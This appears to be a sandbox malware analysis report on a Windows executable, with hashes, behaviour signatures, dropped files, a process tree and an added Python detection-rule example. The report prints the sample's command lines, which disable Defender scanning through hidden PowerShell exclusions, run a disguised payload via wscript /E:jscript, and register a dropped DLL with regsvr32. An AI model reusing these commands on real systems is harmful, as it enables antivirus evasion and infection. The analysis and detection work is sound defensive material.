Analysis

  • max time kernel
    119s
  • max time network
    109s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26/06/2024, 20:32

General

  • Target

    2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe

  • Size

    428KB

  • MD5

    2a90a7ccf98e12ba57583e1e012eca18

  • SHA1

    66512ffb8c58d1444622ff64f189cd7db7dbde1d

  • SHA256

    2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8

  • SHA512

    b7fbfbfc94c06337fd7bcf933f73f39d3c1aa7f17b4708e846e4ba64cab59249736e8733b8a627ed5292e568cfd5e0106275cec8b8dded8fd71cb60e285a72e5

  • SSDEEP

    6144:1OYGXaPNxdgSdcq2pVZPOJHAbK/egjnOtOjgndbpZgBJDEFdkYnC:xGqN/XdctpVtkPewnOtHd98EQYC

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Runs PowerShell with its display window hidden.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Deletes itself 1 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Loads dropped DLL 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
    "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3224
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe")
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4684
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3140
      • C:\Windows\SysWOW64\wscript.exe
        wscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"
        3⤵
        • Checks computer location settings
        • Deletes itself
        • Modifies registry class
        • Suspicious behavior: RenamesItself
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4820
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /i /s "C:\Users\Admin\AppData\Local\dynwrapx.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:5104
  • C:\Windows\SysWOW64\wscript.exe
    C:\Windows\SysWOW64\wscript.exe "C:\Users\Admin\AppData\Local\715f25e70.js" 76
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Modifies registry class
    PID:1784
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc 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
    1⤵
    • Process spawned unexpected child process
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1676
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kvy0zkmh\kvy0zkmh.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:64
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES60CD.tmp" "c:\Users\Admin\AppData\Local\Temp\kvy0zkmh\CSCC439CA88B3F748ED93F5AEEC36EE23.TMP"
        3⤵
          PID:4368
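The process tree above shows the whole chain in one place: cmd.exe adds a Defender exclusion for C: through a hidden PowerShell, hands an extensionless payload to wscript.exe with the /E:jscript engine override, that script registers a dropped DLL from %LOCALAPPDATA% with regsvr32 and adds a second exclusion, and a separate encoded PowerShell compiles C# at run time through csc.exe. As an added example that is not part of the Triage report, the Python below turns each of those behaviours into a rule over process-creation records and runs the rules against records constructed from the tree: the PIDs and command lines are copied from the report, the parent images are inferred from the nesting (the page shows none for the three roots), the -enc payload is a placeholder because the page elides it, and PID 9001 is a constructed benign control. The rule and function names are my own, not Triage's signature names.

```python
"""Added example, not from the Triage report: process-creation rules for the
behaviours in the tree above, run over constructed records modelled on it.
Parent images are inferred from the tree nesting (the page shows none for the
three roots), the -enc payload the page elides is a placeholder, and PID 9001
is a constructed benign control."""
import re
from typing import NamedTuple

class Event(NamedTuple):
    pid: int
    image: str
    parent_image: str  # "" where the report shows no parent
    cmdline: str

_EXE = (r"C:\Users\Admin\AppData\Local\Temp"
        r"\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe")
_CMD = r"C:\Windows\SysWOW64\cmd.exe"
_PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
_PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_WS32 = r"C:\Windows\SysWOW64\wscript.exe"
_CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"

EVENTS = [
    Event(4684, _CMD, _EXE,
          r'"C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass'
          r' Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 14438590 76 "'
          + _EXE + '")'),
    Event(3140, _PS32, _CMD,
          r'powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"'),
    Event(1812, _WS32, _CMD, r'wscript.exe /E:jscript 14438590 76 "' + _EXE + '"'),
    Event(4820, _PS32, _WS32, '"' + _PS64 + r'" -NonI -W Hidden -Exec Bypass Add-MpPreference'
          r' -ExclusionPath "C:\Users\Admin\AppData\Local"'),
    Event(5104, r"C:\Windows\SysWOW64\regsvr32.exe", _WS32,
          r'"C:\Windows\System32\regsvr32.exe" /i /s "C:\Users\Admin\AppData\Local\dynwrapx.dll"'),
    Event(1784, _WS32, "", _WS32 + r' "C:\Users\Admin\AppData\Local\715f25e70.js" 76'),
    Event(1676, _PS64, "", "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc <elided-on-page>"),
    Event(64, _CSC, _PS64, '"' + _CSC + r'" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kvy0zkmh\kvy0zkmh.cmdline"'),
    Event(9001, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",
          r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\Documents\notes.txt'),  # benign control
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def tokens(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]

def _image_is(ev, *names):
    return ev.image.lower().endswith(names)

def defender_exclusion(ev):
    """Anything adding a Defender path exclusion (PIDs 4684, 3140 and 4820 above)."""
    t = [x.lower() for x in tokens(ev.cmdline)]
    return "add-mppreference" in t and "-exclusionpath" in t

def hidden_or_encoded_powershell(ev):
    """powershell.exe started with a hidden window (-W/-WindowStyle Hidden) or -enc/-e."""
    if not _image_is(ev, "powershell.exe"):
        return False
    t = [x.lower() for x in tokens(ev.cmdline)]
    hidden = any(t[i].startswith("-w") and "windowstyle".startswith(t[i][1:]) and t[i + 1] == "hidden"
                 for i in range(len(t) - 1))
    encoded = any(x.startswith("-e") and "encodedcommand".startswith(x[1:]) for x in t)
    return hidden or encoded

SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")

def script_host_abuse(ev):
    """wscript/cscript forced onto an engine with /E: or given a file with no script extension (PID 1812)."""
    if not _image_is(ev, "wscript.exe", "cscript.exe"):
        return False
    args = tokens(ev.cmdline)[1:]
    engine_override = any(a.lower().lstrip("/").startswith("e:") for a in args)
    positional = [a for a in args if not a.startswith("/")]
    return engine_override or (bool(positional) and not positional[0].lower().endswith(SCRIPT_EXTS))

USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

def regsvr32_user_writable_dll(ev):
    """regsvr32 registering a DLL from a user-writable directory (PID 5104)."""
    return _image_is(ev, "regsvr32.exe") and any(
        a.lower().endswith(".dll") and any(d in a.lower() for d in USER_WRITABLE)
        for a in tokens(ev.cmdline)[1:])

def powershell_runtime_compile(ev):
    """PowerShell spawning csc.exe, i.e. Add-Type compiling C# at run time (PID 64)."""
    return ev.parent_image.lower().endswith("powershell.exe") and _image_is(ev, "csc.exe")

RULES = [defender_exclusion, hidden_or_encoded_powershell, script_host_abuse,
         regsvr32_user_writable_dll, powershell_runtime_compile]

def scan(events):
    """Return (rule name, pid) for every rule that fires on every event."""
    return [(rule.__name__, ev.pid) for ev in events for rule in RULES if rule(ev)]

if __name__ == "__main__":
    for name, pid in scan(EVENTS):
        print(f"{pid:>5}  {name}")
```

Run as a script it prints nine hits across six of the eight malicious records. The one malicious record the rules do not fire on is PID 1784: a .js under %LOCALAPPDATA% launched with no unusual switches, which the report flags only because its parent is unexpected, and that is information a rule over a single process-creation record does not have. The engine-override rule is the one most worth keeping even where the others are too noisy, since /E:jscript on a file with no script extension is exactly the trick used here to run a payload that no extension handler would have executed.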

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      8340b5c4942d912a9d2454e9696b9a7e

      SHA1

      8b1594782f19f28b4b54f7a6363957982afa17c3

      SHA256

      9eaef035d56edd24f57fff57ebee0f4c44a7029562ca4b2ad3a36351385b5c22

      SHA512

      6c805b6b00101797609d62f20a13d388a98001f56bd9a0b9a0cf5ad506d5b5293f0539fc8c8e3fe1761378d6797c7a5792fbda859c0e8bdef260a9566c5cc675

    • C:\Users\Admin\AppData\Local\Temp\1067919630

      Filesize

      41KB

      MD5

      c4d2d117803c4f2a631087eb2ade30a6

      SHA1

      ff32d1b965a2f5956639b6540e5c2d15e7f289d9

      SHA256

      375e8265900a3c4acebd38bdcd959efa80ccc73a47003eef7b6fc019bfd118c8

      SHA512

      ae85c1b6f948cf298ae498b653ee3435a96b4dd1cde65f0edb426b8c0d596f14b6bc8c5b7598278e6779f1b38f2158ade30b9dbba7c9b0dad04fb83c616b1ab7

    • C:\Users\Admin\AppData\Local\Temp\14438590

      Filesize

      57KB

      MD5

      edc65270f5b190e82fd98b85303c8e97

      SHA1

      bade9760997ac713743cf48759acc58867a0dd73

      SHA256

      2d61b9799418fe0005eb663b970b19d8e330b51e3b68099a209d066c84d32015

      SHA512

      699abecff99bb9ff7d4443c39a1ad853df025531aac4ceb5c12f765f501ad4b456eea9d5994a847fca67674bcafb9cf29c4c4873c839b5d66a4d0602e534184f

    • C:\Users\Admin\AppData\Local\Temp\RES60CD.tmp

      Filesize

      1KB

      MD5

      17d908ce68aac11f1d0004189f3bd47e

      SHA1

      b8e4da7e605a32192eb7dbd6ec6261d6c5cc58ff

      SHA256

      af72714ed27dffc4ad0e4a24e9f4ec76585a45312172af77b7ce0cacb1893561

      SHA512

      ad6fa32bcb839403513e42b7f02ebb2d71710c3f9bb13173a4c6c85e89337f9d941bb815c2f4a76f0af2140ac3efc5f7f1093c61cfdbbab3c41da5f9055458d2

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bhykyiny.shi.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

      Filesize

      13KB

      MD5

      0a235e8362613509efd31bfdbb22f978

      SHA1

      8bcb0297001dfd4963e8d17270ad0d2024a96912

      SHA256

      175c6cc0a98c16f18e333b5622415d3d962a5d1c05044d34823c8541d6abfcd5

      SHA512

      bb2cf2457ba063c971c9944f9a6fda4a89eab80265e270f6371a826bdfc753a62828c83f984897127f213837adb8f90956263dd51823e270c5081fafea630db4

    • C:\Users\Admin\AppData\Local\Temp\kvy0zkmh\kvy0zkmh.dll

      Filesize

      9KB

      MD5

      8cb11e301b74ad863f98032c967fe0cf

      SHA1

      1b8b9cf8b2f9ca0a6324cc3169d8f987de8853d2

      SHA256

      44c0bad0d0f6270729524c29931988f70465de523f69447bc1cd803c6e56af14

      SHA512

      35a8ba90f36f1b56550a5b4379e65a6e09508205ce690819c11c44fbfbaee603d4d99a7cfea9beb5772332be7db963bc188f5d29de02355c7b9ea3185e196e8e

    • C:\Users\Admin\AppData\Local\dynwrapx.dll

      Filesize

      13KB

      MD5

      ca820517f8fd74d21944d846df6b7c20

      SHA1

      1f87eeb37156d64de97d042b9bcfbaf185f8737d

      SHA256

      1b5eb6d4680f7d4da7e2a1a1060b9f13565e082346e375a92244bb55672d49d7

      SHA512

      27e83483f9dd50b2f897b5b93171b17c0e78719b6f05070c7ef4d69fb80f31cb1342b50685e43a7401fc13e56c83d5a52ed7ccfb69ac5bd3c33461fa10f3985a

    • \??\c:\Users\Admin\AppData\Local\Temp\kvy0zkmh\CSCC439CA88B3F748ED93F5AEEC36EE23.TMP

      Filesize

      652B

      MD5

      a773ffca9c39ffc1ba08cdbda6f92ded

      SHA1

      fcaa99e57e84a86c788de5baa3ebf08546f75897

      SHA256

      ad4f611b7214331d646d4766e2f0b9124ca421b2983a400b79a75ae1938c1580

      SHA512

      d76b3377b822936cde56a5418b9e054a3850172292791d910b20f5dea4c22f896c27c1f4c198fd482c2e8ccd1d33b6873b17897aef13b2a18eed3e854ffee089

    • \??\c:\Users\Admin\AppData\Local\Temp\kvy0zkmh\kvy0zkmh.0.cs

      Filesize

      7KB

      MD5

      5d213659c30df0548b2e73c49ab2861d

      SHA1

      cab754a8b7457d595ee1ae8b2926af3a9c11e023

      SHA256

      ea6a45c7d22650d5b5c7a96d543ad90951a5b02126bc3b4917a4ce9ff2d3026d

      SHA512

      724ef31c1f26c5aea409edf99b3a68974a6a58c68b00a6665e66d4732f2438dc9f866a39a9cd7507a6a9667707b890984a7a25f6a1fb7aa68c64a149c52af468

    • \??\c:\Users\Admin\AppData\Local\Temp\kvy0zkmh\kvy0zkmh.cmdline

      Filesize

      494B

      MD5

      6caf8a9f1bc94c53f922890f0aadb604

      SHA1

      3652f8143df75f53273485986ed7e4b21051f7c9

      SHA256

      4144f0461c1d52b72cdca23850c5a0ec233386d0e5086b2090f91d8c3d79e357

      SHA512

      f49dc392717fc212396520c96ee6092e3656ba94b00dc4b4ac03a172a19534aff95626fa4b472876b91c2eeb827a9b35ce9480c75b989d94025192dbd62cd316

    • memory/1676-73-0x000001C5BC1B0000-0x000001C5BC1D2000-memory.dmp

      Filesize

      136KB

    • memory/1676-123-0x000001C5BC3E0000-0x000001C5BC3E8000-memory.dmp

      Filesize

      32KB

    • memory/3140-40-0x0000000005740000-0x00000000057A6000-memory.dmp

      Filesize

      408KB

    • memory/3140-106-0x00000000070C0000-0x00000000070DA000-memory.dmp

      Filesize

      104KB

    • memory/3140-71-0x0000000005DA0000-0x0000000005DBE000-memory.dmp

      Filesize

      120KB

    • memory/3140-81-0x00000000738E0000-0x000000007392C000-memory.dmp

      Filesize

      304KB

    • memory/3140-79-0x0000000006360000-0x0000000006392000-memory.dmp

      Filesize

      200KB

    • memory/3140-94-0x0000000006340000-0x000000000635E000-memory.dmp

      Filesize

      120KB

    • memory/3140-95-0x0000000006F70000-0x0000000007013000-memory.dmp

      Filesize

      652KB

    • memory/3140-72-0x0000000005E50000-0x0000000005E9C000-memory.dmp

      Filesize

      304KB

    • memory/3140-29-0x0000000073A4E000-0x0000000073A4F000-memory.dmp

      Filesize

      4KB

    • memory/3140-132-0x0000000073A40000-0x00000000741F0000-memory.dmp

      Filesize

      7.7MB

    • memory/3140-108-0x0000000007120000-0x000000000712A000-memory.dmp

      Filesize

      40KB

    • memory/3140-30-0x0000000004900000-0x0000000004936000-memory.dmp

      Filesize

      216KB

    • memory/3140-54-0x0000000005920000-0x0000000005C74000-memory.dmp

      Filesize

      3.3MB

    • memory/3140-41-0x00000000057B0000-0x0000000005816000-memory.dmp

      Filesize

      408KB

    • memory/3140-115-0x00000000072C0000-0x00000000072D1000-memory.dmp

      Filesize

      68KB

    • memory/3140-36-0x0000000005010000-0x0000000005032000-memory.dmp

      Filesize

      136KB

    • memory/3140-33-0x0000000073A40000-0x00000000741F0000-memory.dmp

      Filesize

      7.7MB

    • memory/3140-32-0x00000000050A0000-0x00000000056C8000-memory.dmp

      Filesize

      6.2MB

    • memory/3140-31-0x0000000073A40000-0x00000000741F0000-memory.dmp

      Filesize

      7.7MB

    • memory/4820-96-0x00000000738E0000-0x000000007392C000-memory.dmp

      Filesize

      304KB

    • memory/4820-127-0x0000000007BE0000-0x0000000007BF4000-memory.dmp

      Filesize

      80KB

    • memory/4820-128-0x0000000007CE0000-0x0000000007CFA000-memory.dmp

      Filesize

      104KB

    • memory/4820-129-0x0000000007CC0000-0x0000000007CC8000-memory.dmp

      Filesize

      32KB

    • memory/4820-126-0x0000000007BD0000-0x0000000007BDE000-memory.dmp

      Filesize

      56KB

    • memory/4820-112-0x0000000007C20000-0x0000000007CB6000-memory.dmp

      Filesize

      600KB

    • memory/4820-107-0x0000000007FE0000-0x000000000865A000-memory.dmp

      Filesize

      6.5MB